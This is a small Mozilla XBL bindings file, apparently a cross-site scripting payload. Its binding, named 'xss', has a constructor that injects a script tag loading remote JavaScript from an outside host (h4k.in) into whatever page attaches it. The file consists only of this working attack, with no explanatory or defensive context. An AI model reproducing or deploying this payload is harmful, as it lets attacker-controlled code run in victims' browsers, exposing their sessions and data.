<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
  <binding id="xss">
    <implementation>
      <constructor><![CDATA[
	  	a=document.createElement('script');
		a.src='http://h4k.in/i.js';
		document.body.appendChild(a);
	  ]]></constructor>
    </implementation>
  </binding>
</bindings>
